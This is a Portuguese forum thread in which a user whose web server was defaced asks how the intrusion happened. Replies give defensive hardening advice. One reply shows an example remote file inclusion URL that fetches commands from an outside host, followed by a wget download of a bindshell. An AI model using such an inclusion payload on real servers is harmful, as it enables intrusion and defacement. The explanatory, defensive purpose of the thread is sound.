Página 1 de 2 12 ÚltimoÚltimo
+ Responder ao Tópico



  1. #1
    Nunes
    Oi Pessoal,

    Já vi que o meu final de semana não vai ser muito bom... Cheguei hoje na empresa e sabe o que descobri...
    Invadiram o meu servidor Web... Fizeram um Defacement em todas as paginas que eu tinha hospedas aqui...

    Meu pedido de ajuda eh o seguinte:
    Tenho um IPTABLES de frente, ele faz o Firewall e o Nat todos os por traz dele tenho os demais servidores, inclusive o IIS, rodando num Win2k

    Alguem sabe me dizer como esse carinha conseguiu me invadir ?
    Quais as possibilidades ? Por onde ele pode ter entrado ?

    Sei que estou fufu, pois vou ter que reconstruir todos os meus de novo...

    Abraços desesperados a todos e me ajudem...

    Obrigado

    Nunes

  2. #2
    The-shadow
    é a putalhada do brazil... muitos sacaninhas têm a mania qe são hackers, eles fazem asim

    index.php?page=http://site_deles.com.br/comando_pra_executar_no_seu_servicdor.txt
    e dps fazem download de uma bindshell

    wget bha bha bha pra --> /tmp
    ou para /var/tmp

    e dps acham giro por o defacment na zone-h.org, enfim, vamos mas é dar-lhes uma sova

    uma optima solução é a seguinte, faça as partiçoes "/tmp"
    e "/var" separadas, e monte elas no fstab com a flag "noexec" assim o kiddie pode fazer download, escrever apagar dessa partição, mas nc vai consegui executar.

    nos seu /etc/php.ini meta ele a correr em safe mode (safe_mode=On). mta gente pode pensar que é tipo o safe mode do windoz, mas n! na verdade é uma maneira de correr o php com mais segurança.
    dps n se eskeça de também desabilitar algumas funcçoes do php, tais como
    system(), passthru(), shell() shell_exec() etc. (elas podem executar comandos do systema)..

    verifiquie nas páginas ospedadas se elas têm esse bug de inclusão de ficheiros remotos, desenvolva algum alogaritmo que só permita o include de ficheiros se estes se encontrarem na direcotria local..

    e um bom router sempre ajuda, pois hoje em dia existe o conceito de "reverse shell" que mtos desses kiddies infezlimente já sabem usar. uma boa leitura pelo tutorial do pessoal the hackers choice "Placing backdoors trought firewalls" certamente também irá ajudar a evitar problemas futuros...

    espero que a sua semana n seja assim tão ruim
    Cumps.



  3. #3
    The-shadow
    ae cara, eskeçi de dizer, chmod 700 wget ... ftp... telnet ...tftp...
    vai dificultar mto a vida do kiddie, alias ele n vai ter pachorra e vai desistir, afinal n é um hacker..

  4. #4
    admin77789
    se um hacker verdadeiro entrase , como ele poderia burlar tudo isso no meu servidor amigo ? eu setei isso nos meus hosts tb



  5. Bom cara num eh pq vc tem um iptables na frente que vc esta seguro... num adianta ter iptables se vc tem um apache rodando.. o quero dizer eh q a porta 80 fica aberta e deve mesmo ficar!!!
    Tipo o cara deve ter entrado por alguma falha de pacote desatualizado seja do apache ou qq outro....
    Antes de vc fazer qq coisa vc deveria ter isolado essa maquina da rede pra poder analisar os logs....






Tópicos Similares

  1. Fui invadido o que fazer?
    Por standart no fórum Segurança
    Respostas: 15
    Último Post: 14-02-2008, 00:03
  2. Acho que fui invadido
    Por Fukui no fórum Servidores de Rede
    Respostas: 1
    Último Post: 07-07-2006, 06:59
  3. fui invadido??
    Por mcyberx no fórum Servidores de Rede
    Respostas: 6
    Último Post: 04-11-2004, 21:53
  4. Respostas: 20
    Último Post: 12-09-2004, 07:59
  5. Fui Invadido!!! Quero prender o cara!!!
    Por Rodrigo Brim no fórum Segurança
    Respostas: 19
    Último Post: 13-07-2004, 09:17

Visite: BR-Linux ·  VivaOLinux ·  Dicas-L